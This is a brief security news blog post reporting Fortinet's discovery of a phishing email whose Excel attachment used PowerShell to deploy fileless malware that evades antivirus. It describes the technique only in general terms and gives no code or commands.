Cookie Consent by Skip to main content

Hiding in event logs and memory, fileless malware avoids AV

By 27th May 2022Security

“Please find attached the Payments Report for 04/27/2022,” read an email recently found by Fortinet Fortiguard Labs, the threat intelligence platform and research wing of the California-based cybersecurity tech provider Fortinet.

The attachment, no surprise, surely, to security-minded readers, was an infected Excel document where the undisclosed target could, in fact, please find three kinds of malicious code attached.

The Fortinet discovery is an example of fileless malware – intrusive software that can dodge signature-based antivirus tools by hiding out not in files, but memory.

Fileless malware uses a system’s legitimate processes, tools, and scripts to conduct a cyber attack.

The payments report, for example, executed code via the native Microsoft configuration tool PowerShell, according to the Fortinet report. With a cross-platform shell and scripting language, PowerShell allows the automation of commands like ending a user session, sending a pop-up message, deleting a file, or in the case of the Fortinet findings, deploying malware.

With fileless malware, there’s no file for antivirus tech to detect.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.